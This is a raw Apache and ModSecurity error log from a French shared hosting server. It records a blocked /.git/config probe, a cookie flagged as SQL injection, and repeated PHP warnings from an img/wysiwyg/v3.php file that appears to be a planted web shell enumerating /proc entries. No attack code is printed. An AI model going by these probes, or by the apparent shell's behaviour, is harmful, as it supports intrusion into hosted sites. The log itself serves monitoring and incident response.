PHP Warning:  fileperms(): stat failed for /proc/78/task/78/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:29:41.856637 2026] [security2:error] [pid 1695975:tid 1696001] [client 43.161.234.148:56940] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "totalcloud.fr"] [uri "/"] [unique_id "agJmZdVI9ymHBxup7493QAAAAJc"]
[Tue May 12 01:29:41.859429 2026] [autoindex:error] [pid 1695975:tid 1696001] [client 43.161.234.148:56940] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
PHP Warning:  filesize(): stat failed for /proc/196/task/196/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/196/task/196/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/196/task/196/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/196/task/196/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/196/task/196/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/196/task/196/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:29:53.047135 2026] [security2:error] [pid 1709071:tid 1709111] [client 129.226.152.67:53240] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/vous-etes-un-salarie/emploi-sur-notre-territoire/"] [unique_id "agJmcbvMumyrWMfSu7qS9gAAANg"]
[Tue May 12 01:29:56.624336 2026] [security2:error] [pid 1691274:tid 1691294] [client 43.166.1.243:58012] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJmdFfdQaraX_prmqcIxAAAABI"]
[Tue May 12 01:30:03.949735 2026] [authz_core:error] [pid 1707624:tid 1707690] [client 17.22.237.146:55184] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/SimplePie/src/error_log
[Tue May 12 01:30:34.831593 2026] [security2:error] [pid 1630927:tid 1630946] [client 43.166.7.113:50612] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/index.php"] [unique_id "agJmmmiGYYhUwDaJINnP7QAAAVA"]
PHP Warning:  filesize(): stat failed for /proc/205/task/205/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/205/task/205/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/205/task/205/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/205/task/205/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/205/task/205/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/205/task/205/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:31:22.674314 2026] [autoindex:error] [pid 1709071:tid 1709109] [client 66.249.75.230:42608] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 01:31:36.192122 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:36.366460 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:36.553788 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:36.721057 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:36.888363 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:37.083991 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:37.251070 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:37.425202 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:37.592735 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:37.760108 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:37.927906 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:38.095162 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:38.263194 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:38.430128 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:38.600213 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:38.806257 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:38.973067 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:39.139921 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:39.306891 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:39.475904 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:39.660229 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:39.859792 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:40.027531 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:40.194857 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:40.361994 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:40.545698 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:40.753585 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:40.920529 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:41.087882 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:41.254658 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:41.453548 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:41.622767 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:41.791538 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:41.959501 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:42.127280 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:42.296177 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:42.465428 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:42.632639 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:42.800438 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:42.987255 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:43.155587 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:43.322578 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:43.499989 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:43.686055 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:43.859106 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:44.026137 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:44.194172 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:44.361292 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:44.543600 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:46.339417 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:46.980618 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:47.147603 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:47.314435 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:47.483749 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:47.652710 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:47.822475 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:47.989350 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:48.159137 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:48.347119 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:48.527142 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:48.694733 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:48.861555 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:49.029414 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:49.197381 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:49.365423 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:49.533330 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:49.700877 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:49.868348 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:50.035535 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:50.217069 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:50.402077 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:50.569122 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:50.736137 2026] [:error] [pid 1707624:tid 1707688] [client 4.193.137.131:11720] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:31:55.522423 2026] [security2:error] [pid 1695975:tid 1695978] [client 43.135.145.73:45330] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/hirondelle/"] [unique_id "agJm69VI9ymHBxup74937AAAAIA"]
[Tue May 12 01:31:56.220491 2026] [security2:error] [pid 1630927:tid 1630931] [client 213.209.159.113:45128] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agJm7GiGYYhUwDaJINnQWgAAAUE"]
[Tue May 12 01:31:56.220702 2026] [security2:error] [pid 1630927:tid 1630931] [client 213.209.159.113:45128] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agJm7GiGYYhUwDaJINnQWgAAAUE"]
[Tue May 12 01:31:56.220936 2026] [security2:error] [pid 1630927:tid 1630931] [client 213.209.159.113:45128] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agJm7GiGYYhUwDaJINnQWgAAAUE"]
[Tue May 12 01:32:41.265602 2026] [security2:error] [pid 1695975:tid 1696001] [client 170.106.147.63:52904] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "ixinabourgoin.fr"] [uri "/"] [unique_id "agJnGdVI9ymHBxup7494IQAAAJc"]
[Tue May 12 01:33:27.256730 2026] [autoindex:error] [pid 1709071:tid 1709091] [client 107.189.10.248:60539] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://www.google.com.hk
[Tue May 12 01:33:58.849351 2026] [security2:error] [pid 1695975:tid 1695998] [client 46.8.106.3:57031] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f623fe227b0abf33fcc00dcadbd8d9cb||1778544160||1778543800"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agJnZtVI9ymHBxup74941wAAAJQ"], referer: https://la-grande-fabrique.com/?page_id=1928
[Tue May 12 01:33:58.849644 2026] [security2:error] [pid 1695975:tid 1695998] [client 46.8.106.3:57031] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agJnZtVI9ymHBxup74941wAAAJQ"], referer: https://la-grande-fabrique.com/?page_id=1928
[Tue May 12 01:33:58.849925 2026] [security2:error] [pid 1695975:tid 1695998] [client 46.8.106.3:57031] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agJnZtVI9ymHBxup74941wAAAJQ"], referer: https://la-grande-fabrique.com/?page_id=1928
[Tue May 12 01:34:00.126571 2026] [security2:error] [pid 1630927:tid 1630938] [client 46.8.106.3:37975] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f623fe227b0abf33fcc00dcadbd8d9cb||1778544160||1778543800"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agJnaGiGYYhUwDaJINnRAAAAAUg"], referer: https://la-grande-fabrique.com/?page_id=1928
[Tue May 12 01:34:00.126973 2026] [security2:error] [pid 1630927:tid 1630938] [client 46.8.106.3:37975] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agJnaGiGYYhUwDaJINnRAAAAAUg"], referer: https://la-grande-fabrique.com/?page_id=1928
[Tue May 12 01:34:00.127359 2026] [security2:error] [pid 1630927:tid 1630938] [client 46.8.106.3:37975] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agJnaGiGYYhUwDaJINnRAAAAAUg"], referer: https://la-grande-fabrique.com/?page_id=1928
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1705065/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1705065/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1705065/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1705065/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1705065/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1705065/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:34:47.559802 2026] [security2:error] [pid 1695975:tid 1695982] [client 129.226.211.69:36228] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agJnl9VI9ymHBxup7495FQAAAIQ"]
[Tue May 12 01:34:49.426330 2026] [ssl:error] [pid 1709071:tid 1709111] (EAI 2)Name or service not known: [client 93.123.109.79:63607] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 01:34:49.426447 2026] [ssl:error] [pid 1709071:tid 1709111] AH01941: stapling_renew_response: responder error
[Tue May 12 01:34:49.467900 2026] [ssl:error] [pid 1691274:tid 1691298] (EAI 2)Name or service not known: [client 93.123.109.79:64227] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 01:34:49.467935 2026] [ssl:error] [pid 1691274:tid 1691298] AH01941: stapling_renew_response: responder error
[Tue May 12 01:34:54.241250 2026] [ssl:error] [pid 1691274:tid 1691278] (EAI 2)Name or service not known: [client 77.83.39.94:53950] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 01:34:54.241558 2026] [ssl:error] [pid 1691274:tid 1691278] AH01941: stapling_renew_response: responder error
